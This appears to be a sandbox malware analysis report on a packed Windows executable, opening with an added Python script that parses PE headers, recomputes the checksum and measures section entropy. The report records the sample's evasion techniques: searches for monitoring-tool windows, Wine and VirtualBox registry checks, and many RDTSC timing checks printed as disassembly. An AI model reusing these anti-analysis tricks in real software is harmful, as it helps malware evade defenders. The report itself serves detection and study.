Source: file.exe Static PE information: section name: xpxnzipx entropy: 7.952407047426657
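Several of the static indicators in this section and under System Summary (the stored checksum 0x2166de versus the expected 0x21ab5b, the entry point inside .taggant rather than a code section, the unnamed and randomly named sections, and the xpxnzipx section at 7.95 bits per byte with ZLIB complexity 0.99) can be reproduced from the file with nothing but the struct module. The script below is an added example written for this page, not tooling from the sandbox vendor or from the malware. It parses the section table, recomputes the image checksum the way imagehlp does, measures per-section entropy, and reports which section holds the entry point. Because the analysed sample is not on this page, build_sample_pe constructs a small PE32 image with the same shape (a high-entropy section with a random name, entry point in a trailing .taggant section, a wrong stored checksum); the section names and values in that constructed image are assumptions, and STANDARD_SECTIONS is the editor's own list.

```python
import math
import struct
import sys
from collections import Counter

# Editor's list of common compiler-emitted names; anything else is worth a look.
STANDARD_SECTIONS = {b".text", b".rdata", b".data", b".rsrc", b".idata",
                     b".edata", b".reloc", b".bss", b".tls", b".pdata"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniform (packed/encrypted) data."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_header_offsets(data: bytes):
    """Return (optional header offset, section table offset, number of sections)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # COFF header: NumberOfSections at +2, SizeOfOptionalHeader at +16
    num_sections, size_opt = struct.unpack_from("<H12xH", data, e_lfanew + 6)
    opt = e_lfanew + 24
    return opt, opt + size_opt, num_sections


def pe_checksum(data: bytes) -> int:
    """Image checksum as imagehlp computes it: ones'-complement sum of the file as dwords,
    skipping the CheckSum field (OptionalHeader+0x40), folded to 16 bits, plus file length."""
    opt, _, _ = pe_header_offsets(data)
    skip = (opt + 0x40) // 4
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def checksum_status(data: bytes):
    """(stored CheckSum, recomputed CheckSum); a mismatch is the 'invalid checksum' indicator."""
    opt, _, _ = pe_header_offsets(data)
    return struct.unpack_from("<I", data, opt + 0x40)[0], pe_checksum(data)


def with_checksum(data: bytes, value: int) -> bytes:
    """Copy of the image with the CheckSum field replaced."""
    opt, _, _ = pe_header_offsets(data)
    out = bytearray(data)
    struct.pack_into("<I", out, opt + 0x40, value)
    return bytes(out)


def section_report(data: bytes) -> list:
    """Per section: name, non-standard-name flag, raw-data entropy, and whether
    AddressOfEntryPoint (OptionalHeader+16) falls inside its virtual range."""
    opt, table, count = pe_header_offsets(data)
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    rows = []
    for i in range(count):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        name = name.rstrip(b"\0")
        rows.append({
            "name": name.decode("latin-1"),
            "nonstandard_name": name not in STANDARD_SECTIONS,
            "entropy": round(shannon_entropy(data[rptr:rptr + rsize]), 3),
            "has_entry_point": va <= entry < va + max(vsize, rsize),
        })
    return rows


def build_sample_pe() -> bytes:
    """Constructed PE32 image (assumed layout, not the analysed file): one high-entropy
    section with a random name, entry point in a trailing .taggant section, bogus CheckSum."""
    sections = [(b".text", b"\x00" * 0x200),
                (b"xpxnzipx", bytes(range(256)) * 2),   # exactly 8.0 bits/byte
                (b".taggant", b"\xC3" * 0x200)]
    e_lfanew, size_opt = 0x40, 0xE0
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HH12xHH", hdr, e_lfanew + 4, 0x14C, len(sections), size_opt, 0x0102)
    opt = e_lfanew + 24
    struct.pack_into("<H", hdr, opt, 0x10B)          # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x3010)    # AddressOfEntryPoint -> inside .taggant
    struct.pack_into("<I", hdr, opt + 0x40, 0x1234)  # deliberately wrong stored CheckSum
    body = b""
    for i, (name, raw) in enumerate(sections):
        struct.pack_into("<8sIIII12xI", hdr, opt + size_opt + 40 * i, name, len(raw),
                         0x1000 * (i + 1), len(raw), 0x200 * (i + 1), 0x60000020)
        body += raw
    return bytes(hdr) + body


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    stored, computed = checksum_status(image)
    print(f"CheckSum stored=0x{stored:x} computed=0x{computed:x}")
    for row in section_report(image):
        print(row)
```

Run it as `python pe_triage.py file.exe` to get the same three facts the report states for the real sample. A checksum mismatch on its own is weak evidence (many legitimate linkers leave the field at zero), but combined with an entry point outside any standard code section and a near-8.0 section of 0x1a0c00 bytes it is the classic signature of a packer stub unpacking an encrypted payload, which is what the "Unpacked PE file" line above (section rights changed from EW/W to ER) confirms dynamically.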

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00F49BB0

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121E1A2 second address: 121DA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 jns 00007FAF1CCF5656h 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f stc 0x00000010 push dword ptr [ebp+122D0131h] 0x00000016 clc 0x00000017 call dword ptr [ebp+122D2758h] 0x0000001d pushad 0x0000001e cld 0x0000001f xor eax, eax 0x00000021 mov dword ptr [ebp+122D2EF4h], edx 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b pushad 0x0000002c call 00007FAF1CCF5665h 0x00000031 mov ebx, dword ptr [ebp+122D29A1h] 0x00000037 pop ecx 0x00000038 push ebx 0x00000039 jmp 00007FAF1CCF5668h 0x0000003e pop esi 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D2A61h], eax 0x00000046 or dword ptr [ebp+122D3381h], ebx 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2EF4h], edx 0x00000057 jmp 00007FAF1CCF565Fh 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jmp 00007FAF1CCF5668h 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D1882h], edi 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007FAF1CCF5665h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D2EF4h], ebx 0x00000080 jp 00007FAF1CCF5657h 0x00000086 stc 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a jbe 00007FAF1CCF5658h 0x00000090 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139C889 second address: 139C8C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D50h 0x00000007 jmp 00007FAF1CBF1D59h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FAF1CBF1D46h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DA669 second address: 13DA66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13D991F second address: 13D9923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DA82F second address: 13DA839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAF1CCF5656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DC6B7 second address: 13DC6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DC6BD second address: 13DC6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DD6AE second address: 13DD6B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DD6B9 second address: 13DD741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FAF1CCF5681h 0x0000000d pushad 0x0000000e jmp 00007FAF1CCF5660h 0x00000013 jmp 00007FAF1CCF5669h 0x00000018 popad 0x00000019 nop 0x0000001a adc edi, 32196C8Bh 0x00000020 push 00000000h 0x00000022 jmp 00007FAF1CCF5664h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FAF1CCF5658h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2FA7h], eax 0x00000049 push eax 0x0000004a push ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DD741 second address: 13DD745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DE76F second address: 13DE774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DE774 second address: 13DE779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DD89A second address: 13DD8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DE983 second address: 13DE994 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13DE994 second address: 13DE9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 je 00007FAF1CCF5669h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E1A18 second address: 13E1A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E1A1C second address: 13E1A43 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, bx 0x00000011 push 00000000h 0x00000013 adc bl, FFFFFF91h 0x00000016 push 00000000h 0x00000018 mov bx, 6B48h 0x0000001c xchg eax, esi 0x0000001d push ebx 0x0000001e pushad 0x0000001f je 00007FAF1CCF5656h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E1A43 second address: 13E1A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E28EE second address: 13E28F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E28F2 second address: 13E2900 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2900 second address: 13E2904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E38DA second address: 13E38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E4852 second address: 13E486E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5668h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E486E second address: 13E48E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FAF1CBF1D48h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov bh, 61h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FAF1CBF1D48h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov bx, E329h 0x0000004a jmp 00007FAF1CBF1D4Eh 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E48E9 second address: 13E48ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E48ED second address: 13E48F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E48F1 second address: 13E48F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E48F7 second address: 13E4919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E4919 second address: 13E491E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E491E second address: 13E4928 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF1CBF1D4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E0BF0 second address: 13E0C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAF1CCF5658h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jmp 00007FAF1CCF5668h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov ebx, dword ptr [ebp+122D2BB1h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D2A1Dh] 0x00000046 mov eax, dword ptr [ebp+122D05D9h] 0x0000004c cmc 0x0000004d push FFFFFFFFh 0x0000004f sub bh, 00000011h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 pop edi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2A90 second address: 13E2A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E58B9 second address: 13E58BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2B56 second address: 13E2B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E58BE second address: 13E58D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5662h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E2B5A second address: 13E2B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E3AA5 second address: 13E3AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E3AA9 second address: 13E3AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E3AAF second address: 13E3AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF1CCF5656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E3AB9 second address: 13E3ACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007FAF1CBF1D46h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E3ACE second address: 13E3AD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E5B10 second address: 13E5B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D53h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EC767 second address: 13EC76E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EEC09 second address: 13EEC39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF1CBF1D53h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13EEC39 second address: 13EEC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 138AA70 second address: 138AA7A instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF1CBF1D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4344 second address: 13F4364 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF1CCF5662h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4364 second address: 13F4368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4368 second address: 13F436C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4484 second address: 13F449F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FAF1CBF1D53h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F449F second address: 13F44A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E7A38 second address: 13E7A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D50h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E7A53 second address: 13E7A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13E7A57 second address: 13E7A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F9D00 second address: 13F9D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE920 second address: 13FE94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAF1CBF1D4Fh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jne 00007FAF1CBF1D46h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAF1CBF1D4Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE94D second address: 13FE975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5669h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE975 second address: 13FE981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE981 second address: 13FE987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13931DE second address: 13931FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF1CBF1D55h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13931FD second address: 1393203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDD25 second address: 13FDD48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FAF1CBF1D46h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE143 second address: 13FE14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE14D second address: 13FE166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CBF1D53h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE423 second address: 13FE42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAF1CCF5656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE561 second address: 13FE565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE565 second address: 13FE569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE569 second address: 13FE579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FAF1CBF1D46h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
